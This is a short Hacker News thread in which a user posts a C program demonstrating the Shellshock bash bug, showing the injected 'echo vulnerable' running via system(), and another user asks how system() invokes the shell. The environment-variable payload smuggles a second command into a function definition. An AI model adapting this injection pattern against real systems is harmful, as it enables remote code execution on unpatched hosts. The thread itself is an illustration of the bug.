Hacker News new | ask | show | jobs
by chappar 4281 days ago
Here is a simple c program to demonstrate this.

#include<stdio.h>

#include <stdlib.h>

int main()

{

   setenv("VAR", "() { :;}; echo vulnerable", 0);
   system("ls");
}

#./a.out

vulnerable

a.out

#
1 comments
daveloyall 4280 days ago
That's awesome.

Does system() invoke /bin/sh? Does it look for 'sh' on the path? What are the rules?

link